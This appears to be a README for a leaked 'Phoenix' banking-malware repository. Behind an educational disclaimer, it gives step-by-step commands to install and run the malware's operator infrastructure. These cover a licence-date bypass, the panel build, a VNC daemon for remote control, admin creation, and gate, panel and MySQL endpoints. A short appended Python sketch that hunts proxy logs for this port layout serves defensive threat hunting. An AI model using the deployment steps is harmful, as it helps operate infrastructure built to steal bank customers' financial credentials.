Notice: I am not the author of the Phoenix malware, and I am not responsible for any actions taken using the information provided in this repository. This repository is shared strictly for educational purposes, aimed at blue teamers, malware reverse engineers, and threat hunters. The tools and instructions provided here are intended to help cybersecurity professionals understand and mitigate the threat posed by Phoenix banking malware.
Any misuse of the information contained in this repository, including but not limited to illegal activities, is strictly prohibited and entirely the responsibility of the individual(s) involved. By using the materials provided here, you agree to use them responsibly and solely for lawful purposes.
This repository is provided "as is" without any warranties, express or implied. The author is not liable for any damage or loss caused by the use or misuse of the information and tools provided.
Phoenix banking bot source code
This repository contains scripts and instructions for deploying the Phoenix Banking Malware analysis and management system.
- Overview
- Prerequisites
- Installation
- Frontend Setup
- Daemon Server Setup
- Settings Panel
- MySQL Setup
- Starting Services
Phoenix is a sophisticated banking malware designed to steal sensitive financial information. This repository provides tools and instructions to deploy a system for analyzing and managing Phoenix malware.
- Ubuntu/Debian-based Linux distribution
- Basic knowledge of terminal commands and system administration
- Update the package list and install dos2unix:
    sudo apt update && sudo apt install dos2unix -y
- Convert and execute the install.sh script:
    dos2unix install.sh
    chmod 777 install.sh
    bash install.sh
- Install Node.js:
    bash node.sh
    export NVM_DIR="$HOME/.nvm"
    [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh"
    [ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion"
    nvm install v19.9.0
    nvm use v19.9.0
- Change License:
  - Open /var/data/www/src/settings.js
  - Change:
      LicenseEnd: new Date('2030-09-26'),
    to:
      LicenseEnd: new Date('2500-09-26'),
- Build Frontend:
    cd /var/data/www
    npm install && npm run build
    npm start # Verify the frontend starts correctly
- Start Daemon Panel:
    cd /var/data/www
    screen npm start
- Start VNC Daemon:
    cd /root
    screen ./vnc
- Access the panel at http://..urlpanel..:5000/login?secret=..loginds..
- Access the traffic panel at http://..trafficpanel../index.php
- Gate URL: http://..urlpanel..:4000
- VNC URL: http://..urlpanel..:9000
- API key for the Gate: ..apicryptkey..
- MySQL Credentials:
  - Server IP: yourip
  - User: phoniex
  - Password: ..passsql..
  - Database: bot
- Restart MySQL and other services:
    sudo service mysql restart
    sudo service nginx restart
    sudo service php8.1-fpm restart
- Add Admin:
    cd /root && ./addadmin.sh
- Start VNC Daemon:
    cd /root
    screen ./vnc
- Start Frontend:
    cd /var/data/www
    screen npm start
Ensure all services are running as expected by checking the respective URLs and panels.
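
For the threat hunters this README addresses, the port layout listed above (Gate on 4000, panel login on 5000 with a `secret` query parameter, VNC on 9000) can be turned into a proxy-log hunt. The sketch below is an added example, not code from this repository; the log format, the host names, the `hunt` function and the two-role threshold are assumptions, and a match is a lead to investigate, not a verdict.

```python
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Port roles exactly as the README lists them; everything else here is an assumption.
LAYOUT = {4000: "gate", 5000: "panel", 9000: "vnc"}

# Constructed sample proxy log, "<client_ip> <method> <url>" (hypothetical format).
SAMPLE_LOG = """\
10.0.0.21 POST http://c2.example.test:4000/
10.0.0.21 GET http://c2.example.test:9000/
10.0.0.7 GET http://c2.example.test:5000/login?secret=PLACEHOLDER
10.0.0.9 GET http://intranet.example.test:5000/login
10.0.0.9 GET http://files.example.test:9000/status
10.0.0.21 GET https://www.example.test/
not a log line
"""

def hunt(log_text, min_roles=2):
    """Return {host: {"roles", "clients", "secret_login"}} for destination hosts
    that match at least min_roles ports of the layout, or show the secret login URL."""
    seen = defaultdict(lambda: {"roles": set(), "clients": set(), "secret_login": False})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # malformed line: skip rather than guess
        client, _method, url = parts
        try:
            u = urlsplit(url)
            port = u.port  # raises ValueError on a non-numeric port
        except ValueError:
            continue
        # The README serves every endpoint over plain HTTP on a fixed port.
        if u.scheme != "http" or port not in LAYOUT or not u.hostname:
            continue
        entry = seen[u.hostname]
        entry["roles"].add(LAYOUT[port])
        entry["clients"].add(client)
        if port == 5000 and u.path == "/login" and "secret" in parse_qs(u.query):
            entry["secret_login"] = True
    # One common port alone (5000 or 9000) is noise; require a combination.
    return {h: e for h, e in seen.items()
            if len(e["roles"]) >= min_roles or e["secret_login"]}

if __name__ == "__main__":
    for host, e in hunt(SAMPLE_LOG).items():
        print(host, sorted(e["roles"]), sorted(e["clients"]), e["secret_login"])
```

The `clients` set of each hit lists the internal addresses that talked to the flagged host, which is where endpoint triage would start.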